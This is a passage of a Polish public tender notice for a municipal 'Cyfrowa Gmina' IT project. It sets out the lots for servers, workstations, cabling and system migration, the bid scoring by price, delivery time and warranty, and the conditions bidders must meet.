Dostawa 25 sztuk oprogramowania biurowego<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72268000-1 - Usługi dostawy oprogramowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">48700000-5 - Pakiety oprogramowania użytkowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 4 Usługa remontu oraz uporządkowania istniejącego okablowania sieciowego i urządzeń w serwerowni<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32421000-0 - Okablowanie sieciowe</p> <p class="mb-0">30211400-5 - Konfiguracje komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">48820000-2 - Serwery</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: dostawa sprzętu, oprogramowania, montaż, uruchomienie i inne usługi związane z okablowaniem i wdrożeniem oprogramowania – w celu realizacji projektu Przedmiotem zamówienia jest dostawa sprzętu komputerowego w ramach realizacji projektu „Cyfrowa Gmina”<br/>Pakiet nr 6 Usługa migracji, aktualizacji, konfiguracji systemów i sieci UMAK<br/>Szczegółowy opis przedmiotu zamówienia znajduje się we SWZ oraz we wzorze umowy, formularzu cenowym, OPZ (Opisie Przedmiotu Zamówienia). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">72263000-6 - Usługi wdrażania oprogramowania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">72268000-1 - Usługi dostawy oprogramowania</p> <p class="mb-0">48517000-5 - Pakiety oprogramowania informatycznego</p> <p class="mb-0">30211400-5 - Konfiguracje komputerowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-08-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/><br/>1) Cena (C) – waga kryterium 60% (60 pkt);<br/><br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>1) Cena (C):<br/><br/> cena oferty najtańszej brutto*<br/>C = ------------------------------------------------ x 100 pkt x 60% <br/> cena badanej oferty brutto *<br/><br/> spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/><br/>a) Podstawą przyznania punktów w kryterium „Cena” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym. <br/>b) Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia. <br/><br/>3) Termin dostawy (TD) – waga kryterium 20% (20 pkt)<br/><br/>Termin dostawy – do 4 tygodni od dnia podpisania umowy - 20 pkt <br/>Termin dostawy – do 6 tygodni od dnia podpisania umowy - 10 pkt<br/>Termin dostawy nie później niż do 30 sierpnia 2023r. - 0 pkt<br/><br/>3) Gwarancja i Serwis posprzedażny (GS) – waga kryterium 20% (20 pkt)<br/>Zadeklarowana długość gwarancji i serwisu posprzedażnego (przez Wykonawcę dla oferowanych urządzeń (długość serwisu posprzedażnego i gwarancji musi być taka sama):<br/><br/>Przyznana ilość punktów w kryterium – GS<br/>a) 6 miesięczna gwarancja jakości i serwisu posprzedażnego – 0 pkt<br/>b) 12 miesięczna gwarancja jakości i serwisu posprzedażnego - 5 pkt<br/>b) 24 miesięczna gwarancja jakości i serwisu posprzedażnego - 10 pkt<br/>c) 36 miesięczna gwarancja jakości i serwisu posprzedażnego - 20 pkt<br/>Zamawiający zastrzega, że:<br/>A. Nie dopuszcza podania w ofercie okresu gwarancji (minimalny okres serwisu posprzedażnego musi być równy okresowi oferowanej gwarancji) innego niż 6, 12, 24, 36 miesięcy; <br/>B. W przypadku podania okresu gwarancji krótszego niż 6 miesięcy, Zamawiający na podstawie art. 226 ust. 1 pkt 5) ustawy - Prawo zamówień publicznych odrzuci ofertę z uwagi na fakt, iż jej treść nie odpowiada treści Specyfikacji Warunków zamówienia;<br/>C. W przypadku podania okresu gwarancji dłuższego niż 36 miesięcy, Zamawiający dla potrzeb obliczenia punktacji w kryterium gwarancji jakości sprowadzi okres gwarancji do 36 miesięcy i oceni ofertę z uwzględnieniem takiego okresu gwarancji.<br/>D. UWAGA! W przypadku pakietu nr 5 (Pakiet nr 5 Dostawa serwerów oraz stacji roboczych i UPS) kryterium oceny ofert dotyczy tylko UPS. W przypadku stacji roboczych minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 24 miesiące, a w przypadku serwerów minimalny wymagany okres gwarancji i serwisu posprzedażnego równy jest 60 miesiącom (Zaoferowanie w Formularzu cenowym dla serwerów i stacji roboczych krótszych okresów gwarancji spowoduje odrzucenie oferty Wykonawcy). Wszystkie warunki znajdują się w OPZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i Serwis posprzedażny</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym: Warunek zostanie spełniony, jeżeli wykonawcy prowadzący działalność gospodarczą lub zawodową będą wpisani do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym mają siedzibę lub miejsce zamieszkania (np. KRS CDEIG w Polsce)<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów: <br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej: <br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/>A) posiada ubezpieczenie odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości co najmniej 20 000,00 zł.<br/>4) zdolności technicznej lub zawodowej: <br/>Wykonawca spełni warunek, jeżeli wykaże, że:<br/><br/>A) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną dostawę oprogramowania lub sprzętu (Zamawiający dopuszcza również np. dostawę serwerów, usługę budowy, modernizacji okablowania sieciowego, LAN lub usługę migracji, aktualizacji, konfiguracji systemów, albo sieci) o wartości minimum 30 000 zł brutto odpowiadający swym zakresem opisowi przedmiotu zamówienia. Na dowód należytego wykonania robót do oferty Wykonawca powinien załączyć odpowiednie referencje, poświadczenia, itp. Jeżeli dokumenty nie zostaną dołączone do oferty Zamawiający zgodnie z art. 274 ust. 1 Pzp wezwie Wykonawcę, którego oferta została najwyżej oceniona w wyznaczonym terminie, nie krótszym niż 5 dni, do złożenia podmiotowych środków dowodowych, w tym potwierdzających spełnianie warunków udziału w postępowaniu.<br/><br/><br/>3. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w odniesieniu do warunku dotyczącego zdolności technicznej lub zawodowej – dopuszcza łączne spełnianie warunku przez Wykonawców.<br/>4. Zamawiający może na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (t.j. Dz. U. z 2021 r. poz. 275, z późn. zm.), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 3 do SWZ;.<br/>Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów określających czy te dostawy lub usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy lub usługi były wykonywane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane w okresie ostatnich 3 miesięcy - załącznik nr 5 do SWZ;<br/> dowód opłaconej polisy OC</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający składa wraz z ofertą przedmiotowe środki dowodowe (art. 107 ust. 1 p.z.p.). Jeżeli Wykonawca nie złożył przedmiotowych środków dowodowych lub złożone środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie (art. 107 ust. 2 p.z.p.). Przedmiotowymi środkami dowodowymi są: Deklaracja właściwości użytkowych oferowanych urządzeń i certyfikaty/katalogi/foldery/ulotki techniczne (nie dotyczy oprogramowania) lub poświadczenie oryginalności i legalności oferowanego oprogramowania (nie dotyczy urządzeń i usług). Wykonawca składa deklarację lub 